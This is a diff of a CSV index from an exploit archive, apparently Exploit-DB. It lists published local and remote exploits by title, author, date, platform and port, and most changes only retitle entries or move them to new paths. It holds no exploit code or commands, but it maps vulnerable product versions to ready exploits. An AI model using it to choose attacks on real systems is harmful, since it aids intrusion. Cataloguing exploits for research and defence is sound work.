-25039,platforms/aix/local/25039.txt,"IBM AIX 5.x - Diag Privilege Escalation Vulnerabilities",2004-12-20,cees-bart,aix,local,0
+25039,platforms/aix/local/25039.txt,"IBM AIX 5.x - 'Diag' Privilege Escalation",2004-12-20,cees-bart,aix,local,0
 25040,platforms/php/local/25040.php,"PHP 4.x/5.0 Shared Memory Module - Offset Memory Corruption",2004-12-20,"Stefano Di Paola",php,local,0
 25055,platforms/osx/local/25055.c,"Darwin Kernel 7.1 - Mach File Parsing Local Integer Overflow",2005-01-19,nemo@felinemenace.org,osx,local,0
 25080,platforms/linux/local/25080.txt,"Newsgrab 0.5.0pre4 - Multiple Local And Remote Vulnerabilities",2005-02-02,"Niels Heinen",linux,local,0
@@ -8069,7 +8070,7 @@ id,file,description,date,author,platform,type,port
 28955,platforms/windows/local/28955.py,"Internet Haut Debit Mobile PCW_MATMARV1.0.0B03 - Buffer Overflow (SEH)",2013-10-14,metacom,windows,local,0
 28969,platforms/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - Buffer Overflow (SEH)",2013-10-15,metacom,windows,local,0
 28984,platforms/hp-ux/local/28984.pl,"HP Tru64 4.0/5.1 - POSIX Threads Library Privilege Escalation",2006-11-13,"Adriel T. Desautels",hp-ux,local,0
-40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based + Gentoo) - 'logrotate' Local Privilege Escalation",2016-11-16,"Dawid Golunski",linux,local,0
+40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based Distros + Gentoo) - 'logrotate' Privilege Escalation",2016-11-16,"Dawid Golunski",linux,local,0
 29069,platforms/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxfw.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
 29070,platforms/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxstart.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
 29102,platforms/openbsd/local/29102.c,"OpenBSD 3.9/4.0 - ld.so Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local,0
@@ -8542,7 +8543,7 @@ id,file,description,date,author,platform,type,port
 39214,platforms/linux/local/39214.c,"Linux Kernel 3.3.5 - '/drivers/media/media-device.c' Local Information Disclosure",2014-05-28,"Salva Peiro",linux,local,0
 39217,platforms/linux/local/39217.c,"Amanda 3.3.1 - Privilege Escalation",2016-01-11,"Hacker Fantastic",linux,local,0
 39230,platforms/linux/local/39230.c,"Linux Kernel 4.3.3 - 'overlayfs' Privilege Escalation (2)",2016-01-12,halfdog,linux,local,0
-39244,platforms/linux/local/39244.txt,"Amanda 3.3.1 - amstar Command Injection Privilege Escalation",2016-01-15,"Hacker Fantastic",linux,local,0
+39244,platforms/linux/local/39244.txt,"Amanda 3.3.1 - 'amstar' Command Injection Privilege Escalation",2016-01-15,"Hacker Fantastic",linux,local,0
 39260,platforms/windows/local/39260.txt,"WEG SuperDrive G2 12.0.0 - Insecure File Permissions",2016-01-18,LiquidWorm,windows,local,0
 39277,platforms/linux/local/39277.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Privilege Escalation (1)",2016-01-19,"Perception Point Team",linux,local,0
 40003,platforms/linux/local/40003.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Privilege Escalation (2)",2016-01-19,"Federico Bento",linux,local,0
@@ -8555,22 +8556,22 @@ id,file,description,date,author,platform,type,port
 40774,platforms/linux/local/40774.sh,"Nagios 4.2.2 - Privilege Escalation",2016-11-18,"Vincent Malguy",linux,local,0
 39340,platforms/android/local/39340.cpp,"Google Android - 'sensord' Privilege Escalation",2016-01-27,s0m3b0dy,android,local,0
 39417,platforms/windows/local/39417.py,"FTPShell Client 5.24 - (Create NewFolder) Local Buffer Overflow",2016-02-04,"Arash Khazaei",windows,local,0
-39432,platforms/windows/local/39432.c,"Microsoft Windows 7 SP1 (x86) - 'WebDAV' Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,windows,local,0
-39433,platforms/linux/local/39433.py,"Deepin Linux 15 - lastore-daemon Privilege Escalation",2016-02-10,"King's Way",linux,local,0
+39432,platforms/win_x86/local/39432.c,"Microsoft Windows 7 SP1 (x86) - 'WebDAV' Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,win_x86,local,0
+39433,platforms/linux/local/39433.py,"Deepin Linux 15 - 'lastore-daemon' Privilege Escalation",2016-02-10,"King's Way",linux,local,0
 39438,platforms/xml/local/39438.txt,"Wieland wieplan 4.1 - Document Parsing Java Code Execution Using XMLDecoder",2016-02-10,LiquidWorm,xml,local,0
 39442,platforms/windows/local/39442.txt,"Microsoft Windows - Kerberos Security Feature Bypass (MS16-014)",2016-02-15,"Nabeel Ahmed",windows,local,0
 39443,platforms/windows/local/39443.py,"Delta Industrial Automation DCISoft 1.12.09 - Stack Buffer Overflow",2016-02-15,LiquidWorm,windows,local,0
-39446,platforms/win_x86/local/39446.py,"Microsoft Windows - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-02-15,"Rick Larabee",win_x86,local,0
+39446,platforms/win_x86/local/39446.py,"Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-02-15,"Rick Larabee",win_x86,local,0
 39480,platforms/windows/local/39480.py,"Core FTP Server 1.2 - Buffer Overflow (PoC)",2016-02-22,INSECT.B,windows,local,0
 39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus - 'SHFolder.dll' Local Privilege Elevation Exploit",2016-02-29,Laughing_Mantis,windows,local,0
 39510,platforms/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,windows,local,0
 39520,platforms/win_x86-64/local/39520.txt,"Secret Net 7 and Secret Net Studio 8 - Privilege Escalation",2016-03-02,Cr4sh,win_x86-64,local,0
 39523,platforms/windows/local/39523.rb,"AppLocker - Execution Prevention Bypass (Metasploit)",2016-03-03,Metasploit,windows,local,0
-39525,platforms/win_x86-64/local/39525.py,"Microsoft Windows 7 (x64) - 'afd.sys' Privilege Escalation (MS14-040)",2016-03-07,"Rick Larabee",win_x86-64,local,0
+39525,platforms/win_x86-64/local/39525.py,"Microsoft Windows 7 (x64) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-03-07,"Rick Larabee",win_x86-64,local,0
 39531,platforms/windows/local/39531.c,"McAfee VirusScan Enterprise 8.8 - Security Restrictions Bypass",2016-03-07,"Maurizio Agazzini",windows,local,0
 39535,platforms/linux/local/39535.sh,"Exim 4.84-3 - Privilege Escalation",2016-03-09,"Hacker Fantastic",linux,local,0
 39549,platforms/linux/local/39549.txt,"Exim < 4.86.2 - Privilege Escalation",2016-03-10,"Dawid Golunski",linux,local,0
-39574,platforms/windows/local/39574.cs,"Microsoft Windows 8.1/10 (x86) - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",windows,local,0
+39574,platforms/win_x86/local/39574.cs,"Microsoft Windows 8.1/10 (x86) - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",win_x86,local,0
 39579,platforms/windows/local/39579.py,"Internet Download Manager 6.25 Build 14 - 'Find file' Unicode SEH Exploit",2016-03-21,"Rakan Alotaibi",windows,local,0
 39594,platforms/windows/local/39594.pl,"CoolPlayer (Standalone) build 2.19 - '.m3u' Stack Overflow",2016-03-22,"Charley Celice",windows,local,0
 39595,platforms/multiple/local/39595.txt,"Apple Mac OSX / iOS - SUID Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0
@@ -8672,13 +8673,13 @@ id,file,description,date,author,platform,type,port
 40484,platforms/windows/local/40484.txt,"Wacom Consumer Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
 40485,platforms/windows/local/40485.txt,"Foxit Cloud Update Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
 40488,platforms/linux/local/40488.txt,"Apache Tomcat 8/7/6 (RedHat-Based Distros) - Privilege Escalation",2016-10-10,"Dawid Golunski",linux,local,0
-40489,platforms/lin_x86-64/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation",2016-10-10,"Qian Zhang",lin_x86-64,local,0
+40489,platforms/linux/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation",2016-10-10,"Qian Zhang",linux,local,0
 40490,platforms/windows/local/40490.txt,"Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation",2016-10-10,hyp3rlinx,windows,local,0
 40494,platforms/windows/local/40494.txt,"Minecraft Launcher 1.6.61 - Insecure File Permissions Privilege Escalation",2016-10-11,"Ross Marks",windows,local,0
 40497,platforms/windows/local/40497.txt,"sheed AntiVirus 2.3 - Unquoted Service Path Privilege Escalation",2016-10-11,Amir.ght,windows,local,0
-40564,platforms/windows/local/40564.c,"Microsoft Windows (x86) - 'afd.sys' Privilege Escalation (MS11-046)",2016-10-18,"Tomislav Paskalev",windows,local,0
+40564,platforms/win_x86/local/40564.c,"Microsoft Windows (x86) - 'afd.sys' Privilege Escalation (MS11-046)",2016-10-18,"Tomislav Paskalev",win_x86,local,0
 40503,platforms/linux/local/40503.rb,"Linux Kernel 3.13.1 - 'Recvmmsg' Privilege Escalation (Metasploit)",2016-10-11,Metasploit,linux,local,0
-40504,platforms/android/local/40504.rb,"Allwinner 3.4 Legacy Kernel - Local Privilege Escalation (Metasploit)",2016-10-11,Metasploit,android,local,0
+40504,platforms/android/local/40504.rb,"Allwinner 3.4 Legacy Kernel - Privilege Escalation (Metasploit)",2016-10-11,Metasploit,android,local,0
 40523,platforms/windows/local/40523.txt,"ATKGFNEXSrv ATKGFNEX 1.0.11.1 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",windows,local,0
 40525,platforms/windows/local/40525.txt,"IObit Malware Fighter 4.3.1 - Unquoted Service Path Privilege Escalation",2016-10-13,Amir.ght,windows,local,0
 40528,platforms/windows/local/40528.txt,"Hotspot Shield 6.0.3 - Unquoted Service Path Privilege Escalation",2016-10-13,Amir.ght,windows,local,0
@@ -8709,7 +8710,7 @@ id,file,description,date,author,platform,type,port
 40608,platforms/windows/local/40608.cs,"Microsoft Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0
 40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition PoC (Write Access)",2016-10-19,"Phil Oester",linux,local,0
 40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0
-40627,platforms/windows/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",windows,local,0
+40627,platforms/win_x86/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",win_x86,local,0
 40630,platforms/windows/local/40630.py,"Network Scanner 4.0.0 - SEH Local Buffer Overflow",2016-10-25,n30m1nd,windows,local,0
 40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0
 40636,platforms/windows/local/40636.txt,"HP TouchSmart Calendar 4.1.4245 - Insecure File Permissions Privilege Escalation",2016-10-27,hyp3rlinx,windows,local,0
@@ -8717,13 +8718,13 @@ id,file,description,date,author,platform,type,port
 40655,platforms/windows/local/40655.txt,"NVIDIA Driver - UVMLiteController ioctl Handling Unchecked Input/Output Lengths Privilege Escalation",2016-10-31,"Google Security Research",windows,local,0
 40660,platforms/windows/local/40660.txt,"NVIDIA Driver - NvStreamKms Stack Buffer Overflow in PsSetCreateProcessNotifyRoutineEx Callback Privilege Escalation",2016-10-31,"Google Security Research",windows,local,0
 40669,platforms/macos/local/40669.txt,"Apple macOS 10.12 - 'task_t' Privilege Escalation",2016-10-31,"Google Security Research",macos,local,0
-40678,platforms/linux/local/40678.c,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege Escalation / Race Condition",2016-11-01,"Dawid Golunski",linux,local,0
+40678,platforms/linux/local/40678.c,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - ('mysql' System User) Privilege Escalation / Race Condition",2016-11-01,"Dawid Golunski",linux,local,0
 40686,platforms/multiple/local/40686.txt,"Citrix Receiver/Receiver Desktop Lock 4.5 - Authentication Bypass",2016-11-02,"Rithwik Jayasimha",multiple,local,0
 40688,platforms/linux/local/40688.rb,"Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Privilege Escalation (Metasploit)",2016-11-02,Metasploit,linux,local,0
-40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0
+40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - ('root' System User) Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0
 40710,platforms/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0
 40838,platforms/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition PoC (Write Access)",2016-10-26,"Phil Oester",linux,local,0
-40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - BPF Local Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0
+40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0
 40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0
 40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
 40788,platforms/linux/local/40788.txt,"Palo Alto Networks PanOS root_trace - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0
@@ -8740,7 +8741,7 @@ id,file,description,date,author,platform,type,port
 40861,platforms/windows/local/40861.txt,"Microsoft Windows Media Center 6.1.7600 - 'ehshell.exe' XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local,0
 40863,platforms/windows/local/40863.txt,"Microsoft Event Viewer 1.0 - XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0
 40864,platforms/windows/local/40864.txt,"Microsoft MSINFO32.EXE 6.1.7601 - '.NFO' XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0
-40865,platforms/windows/local/40865.txt,"Apache CouchDB 2.0.0 - Local Privilege Escalation",2016-12-05,hyp3rlinx,windows,local,0
+40865,platforms/windows/local/40865.txt,"Apache CouchDB 2.0.0 - Privilege Escalation",2016-12-05,hyp3rlinx,windows,local,0
 40871,platforms/linux/local/40871.c,"Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2016-12-06,rebel,linux,local,0
 40873,platforms/windows/local/40873.txt,"Microsoft PowerShell - XML External Entity Injection",2016-12-06,hyp3rlinx,windows,local,0
 40902,platforms/windows/local/40902.txt,"EasyPHP Devserver 16.1.1 - Insecure File Permissions Privilege Escalation",2016-12-11,"Ashiyane Digital Security Team",windows,local,0
@@ -8751,7 +8752,7 @@ id,file,description,date,author,platform,type,port
 40938,platforms/linux/local/40938.py,"RedStar 3.0 Server - 'BEAM & RSSMON' Command Execution (Shellshock)",2016-12-18,"Hacker Fantastic",linux,local,0
 40943,platforms/linux/local/40943.txt,"Google Chrome + Fedora 25 / Ubuntu 16.04 - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",linux,local,0
 40950,platforms/aix/local/40950.sh,"IBM AIX 6.1/7.1/7.2 - 'Bellmail' Privilege Escalation",2016-12-22,"Hector X. Monsegur",aix,local,0
-40953,platforms/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Local Privilege Escalation",2016-12-22,"Luka Pusic",linux,local,0
+40953,platforms/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Privilege Escalation",2016-12-22,"Luka Pusic",linux,local,0
 40956,platforms/macos/local/40956.c,"macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0
 40957,platforms/macos/local/40957.c,"macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",macos,local,0
 40962,platforms/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local,0
@@ -8769,9 +8770,10 @@ id,file,description,date,author,platform,type,port
 41152,platforms/linux/local/41152.txt,"GNU Screen 4.5.0 - Privilege Escalation (PoC)",2017-01-24,"Donald Buczek",linux,local,0
 41154,platforms/linux/local/41154.sh,"GNU Screen 4.5.0 - Privilege Escalation",2017-01-25,"Xiphos Research Ltd",linux,local,0
 41158,platforms/linux/local/41158.txt,"Man-db 2.6.7.1 - Privilege Escalation (PoC)",2015-12-02,halfdog,linux,local,0
-41171,platforms/linux/local/41171.txt,"Systemd 228 - Privilege Escalation (PoC)",2017-01-24,"Sebastian Krahmer",linux,local,0
+41171,platforms/linux/local/41171.txt,"Systemd 228 (SUSE 12 SP2 / Ubuntu Touch 15.04) - Privilege Escalation (PoC)",2017-01-24,"Sebastian Krahmer",linux,local,0
 41173,platforms/linux/local/41173.c,"OpenSSH 6.8 < 6.9 - 'PTY' Privilege Escalation",2017-01-26,"Federico Bento",linux,local,0
 41176,platforms/windows/local/41176.c,"Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow",2017-01-26,"Parvez Anwar",windows,local,0
+41196,platforms/linux/local/41196.txt,"Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Privilege Escalation (PoC)",2017-01-27,"Wolfgang Hotwagner",linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -8812,7 +8814,7 @@ id,file,description,date,author,platform,type,port
 63,platforms/linux/remote/63.c,"miniSQL (mSQL) 1.3 - GID Remote Code Execution",2003-07-25,"the itch",linux,remote,1114
 64,platforms/windows/remote/64.c,"Microsoft Windows - 'RPC DCOM' Remote Buffer Overflow",2003-07-25,Flashsky,windows,remote,135
 66,platforms/windows/remote/66.c,"Microsoft Windows Server 2000/XP - 'RPC DCOM' Remote Exploit (MS03-026)",2003-07-26,"H D Moore",windows,remote,135
-67,platforms/multiple/remote/67.c,"Apache 1.3.x (mod_mylo) - Remote Code Execution",2003-07-28,"Carl Livitt",multiple,remote,80
+67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo - Remote Code Execution",2003-07-28,"Carl Livitt",multiple,remote,80
 69,platforms/windows/remote/69.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (1)",2003-07-29,pHrail,windows,remote,135
 70,platforms/windows/remote/70.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (2)",2003-07-30,anonymous,windows,remote,135
 74,platforms/linux/remote/74.c,"WU-FTPD 2.6.2 - Off-by-One Remote Command Execution",2003-08-03,Xpl017Elz,linux,remote,21
@@ -8851,7 +8853,7 @@ id,file,description,date,author,platform,type,port
 126,platforms/linux/remote/126.c,"Apache mod_gzip (with debug_mode) 1.2.26.1a - Remote Exploit",2003-11-20,xCrZx,linux,remote,80
 127,platforms/windows/remote/127.pl,"Opera 7.22 - File Creation and Execution Exploit (WebServer)",2003-11-22,nesumin,windows,remote,0
 130,platforms/windows/remote/130.c,"Microsoft Windows XP - Workstation Service Remote Exploit (MS03-049)",2003-12-04,fiNis,windows,remote,0
-132,platforms/linux/remote/132.c,"Apache 1.3.x < 2.0.48 (mod_userdir) - Remote Users Disclosure",2003-12-06,m00,linux,remote,80
+132,platforms/linux/remote/132.c,"Apache 1.3.x < 2.0.48 mod_userdir - Remote Users Disclosure",2003-12-06,m00,linux,remote,80
 133,platforms/windows/remote/133.pl,"Eznet 3.5.0 - Remote Stack Overflow / Denial of Service",2003-12-15,"Peter Winter-Smith",windows,remote,80
 135,platforms/windows/remote/135.c,"Microsoft Windows Messenger Service - Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135
 136,platforms/windows/remote/136.pl,"Eznet 3.5.0 - Remote Stack Overflow Universal Exploit",2003-12-18,kralor,windows,remote,80
@@ -8979,7 +8981,7 @@ id,file,description,date,author,platform,type,port
 581,platforms/linux/remote/581.c,"ProFTPd 1.2.10 - Remote Users Enumeration Exploit",2004-10-17,"Leon Juranic",linux,remote,0
 582,platforms/windows/remote/582.c,"YahooPOPs 1.6 - SMTP Remote Buffer Overflow",2004-10-18,"Diabolic Crab",windows,remote,25
 583,platforms/windows/remote/583.pl,"SLX Server 6.1 - Arbitrary File Creation (PoC)",2004-10-18,"Carl Livitt",windows,remote,0
-584,platforms/windows/remote/584.c,"Microsoft Windows (x86) - Metafile '.emf' Heap Overflow (MS04-032)",2004-10-20,houseofdabus,windows,remote,0
+584,platforms/win_x86/remote/584.c,"Microsoft Windows (x86) - Metafile '.emf' Heap Overflow (MS04-032)",2004-10-20,houseofdabus,win_x86,remote,0
 588,platforms/windows/remote/588.py,"Ability Server 2.34 - FTP STOR Buffer Overflow",2004-10-21,muts,windows,remote,21
 589,platforms/windows/remote/589.html,"Multiple (Almost all) Browsers - Tabbed Browsing Vulnerabilities",2004-10-22,"Jakob Balle",windows,remote,0
 590,platforms/windows/remote/590.c,"ShixxNOTE 6.net - Remote Buffer Overflow",2004-10-22,class101,windows,remote,2000
@@ -9030,7 +9032,7 @@ id,file,description,date,author,platform,type,port
 758,platforms/osx/remote/758.c,"Apple iTunes - Playlist Local Parsing Buffer Overflow",2005-01-16,nemo,osx,remote,0
 759,platforms/windows/remote/759.cpp,"Apple iTunes - Playlist Buffer Overflow Download Shellcode Exploit",2005-01-16,ATmaCA,windows,remote,0
 761,platforms/windows/remote/761.cpp,"NodeManager Professional 2.00 - Buffer Overflow",2005-01-18,"Tan Chew Keong",windows,remote,162
-764,platforms/unix/remote/764.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit (2)",2003-04-04,spabam,unix,remote,80
+764,platforms/unix/remote/764.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit",2003-04-04,spabam,unix,remote,80
 765,platforms/windows/remote/765.c,"Microsoft Internet Explorer - '.ANI' Universal Exploit (MS05-002)",2005-01-22,houseofdabus,windows,remote,0
 767,platforms/windows/remote/767.pl,"Golden FTP Server 2.02b - Remote Buffer Overflow",2005-01-22,Barabas,windows,remote,21
 771,platforms/windows/remote/771.cpp,"Microsoft Internet Explorer - '.ANI' Downloader Exploit (MS05-002)",2005-01-24,Vertygo,windows,remote,0
@@ -9156,7 +9158,7 @@ id,file,description,date,author,platform,type,port
 1261,platforms/hp-ux/remote/1261.pm,"HP-UX 11.11 - lpd Remote Command Execution (Metasploit)",2005-10-19,"H D Moore",hp-ux,remote,515
 1262,platforms/windows/remote/1262.pm,"CA Unicenter 3.1 - CAM log_security() Stack Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,4105
 1263,platforms/multiple/remote/1263.pl,"Veritas NetBackup 6.0 (Linux) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",multiple,remote,13722
-1264,platforms/windows/remote/1264.pl,"Veritas NetBackup 6.0 (Windows x86) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",windows,remote,13722
+1264,platforms/win_x86/remote/1264.pl,"Veritas NetBackup 6.0 (Windows x86) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",win_x86,remote,13722
 1265,platforms/osx/remote/1265.pl,"Veritas NetBackup 6.0 (OSX) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",osx,remote,13722
 1272,platforms/linux/remote/1272.c,"Snort 2.4.2 - Back Orifice Parsing Remote Buffer Overflow",2005-10-25,rd,linux,remote,0
 1277,platforms/windows/remote/1277.c,"Mirabilis ICQ 2003a - Buffer Overflow Download Shellcode Exploit",2005-10-29,ATmaCA,windows,remote,0
@@ -9429,7 +9431,7 @@ id,file,description,date,author,platform,type,port
 3661,platforms/windows/remote/3661.pl,"HP Mercury Quality Center - Spider90.ocx ProgColor Overflow",2007-04-04,ri0t,windows,remote,0
 3662,platforms/windows/remote/3662.rb,"AOL SuperBuddy - ActiveX Control Remote Code Execution (Metasploit)",2007-04-04,"Krad Chad",windows,remote,0
 3675,platforms/windows/remote/3675.rb,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow (2)",2007-04-06,"Umesh Wanve",windows,remote,21
-3680,platforms/windows/remote/3680.sh,"Apache (mod_rewrite) (Windows x86) - Off-by-One Remote Overflow",2007-04-07,axis,windows,remote,80
+3680,platforms/win_x86/remote/3680.sh,"Apache mod_rewrite (Windows x86) - Off-by-One Remote Overflow",2007-04-07,axis,win_x86,remote,80
 3698,platforms/linux/remote/3698.txt,"Kerberos 1.5.1 - Kadmind Buffer Overflow",2007-04-10,c0ntex,linux,remote,0
 3708,platforms/multiple/remote/3708.htm,"MiniWebsvr 0.0.7 - Remote Directory Traversal",2007-04-11,shinnai,multiple,remote,0
 3724,platforms/linux/remote/3724.c,"Aircrack-NG 0.7 - 'Specially Crafted 802.11 Packets' Remote Buffer Overflow",2007-04-12,"Jonathan So",linux,remote,0
@@ -9444,7 +9446,7 @@ id,file,description,date,author,platform,type,port
 3810,platforms/windows/remote/3810.html,"IPIX Image Well ActiveX - 'iPIX-ImageWell-ipix.dll' Buffer Overflow",2007-04-27,"Umesh Wanve",windows,remote,0
 3815,platforms/linux/remote/3815.c,"Fenice Oms server 1.10 - Remote Buffer Overflow (exec-shield)",2007-04-29,Xpl017Elz,linux,remote,0
 3821,platforms/linux/remote/3821.c,"3proxy 0.5.3g (Linux) - proxy.c logurl() Remote Buffer Overflow",2007-04-30,vade79,linux,remote,0
-3822,platforms/windows/remote/3822.c,"3proxy 0.5.3g (Windows x86) - proxy.c logurl() Remote Buffer Overflow",2007-04-30,vade79,windows,remote,0
+3822,platforms/win_x86/remote/3822.c,"3proxy 0.5.3g (Windows x86) - proxy.c logurl() Remote Buffer Overflow",2007-04-30,vade79,win_x86,remote,0
 3829,platforms/linux/remote/3829.c,"3proxy 0.5.3g - proxy.c logurl() Remote Overflow (exec-shield)",2007-05-02,Xpl017Elz,linux,remote,0
 3844,platforms/windows/remote/3844.html,"ActSoft DVD-Tools - 'dvdtools.ocx 3.8.5.0' Stack Overflow",2007-05-04,shinnai,windows,remote,0
 3872,platforms/windows/remote/3872.html,"Taltech Tal Bar Code - ActiveX Control Buffer Overflow",2007-05-08,"Umesh Wanve",windows,remote,0
@@ -9473,7 +9475,7 @@ id,file,description,date,author,platform,type,port
 3982,platforms/windows/remote/3982.html,"Dart Communications PowerTCP - Service Control Remote Buffer Overflow",2007-05-24,rgod,windows,remote,0
 3984,platforms/windows/remote/3984.html,"Dart Communications PowerTCP - ZIP Compression Remote Buffer Overflow",2007-05-25,rgod,windows,remote,0
 3993,platforms/windows/remote/3993.html,"Microsoft Internet Explorer 6 / Ademco co. ltd. ATNBaseLoader100 Module - Remote Buffer Overflow",2007-05-26,rgod,windows,remote,0
-3996,platforms/windows/remote/3996.c,"Apache (mod_rewrite) 2.0.58 (Windows 2003) - Remote Overflow",2007-05-26,fabio/b0x,windows,remote,80
+3996,platforms/windows/remote/3996.c,"Apache 2.0.58 mod_rewrite (Windows 2003) - Remote Overflow",2007-05-26,fabio/b0x,windows,remote,80
 4008,platforms/windows/remote/4008.html,"Zenturi ProgramChecker - ActiveX File Download/Overwrite",2007-05-30,shinnai,windows,remote,0
 4010,platforms/windows/remote/4010.html,"EDraw Office Viewer Component - Unsafe Method Exploit",2007-05-30,shinnai,windows,remote,0
 4014,platforms/windows/remote/4014.py,"Eudora 7.1.0.9 - (IMAP FLAGS) Remote Overwrite (SEH)",2007-05-30,h07,windows,remote,0
@@ -9509,7 +9511,7 @@ id,file,description,date,author,platform,type,port
 4157,platforms/windows/remote/4157.cpp,"SAP DB 7.4 - WebTools Remote Overwrite (SEH)",2007-07-07,Heretic2,windows,remote,9999
 4158,platforms/windows/remote/4158.html,"NeoTracePro 3.25 - ActiveX TraceTarget() Remote Buffer Overflow",2007-07-07,nitr0us,windows,remote,0
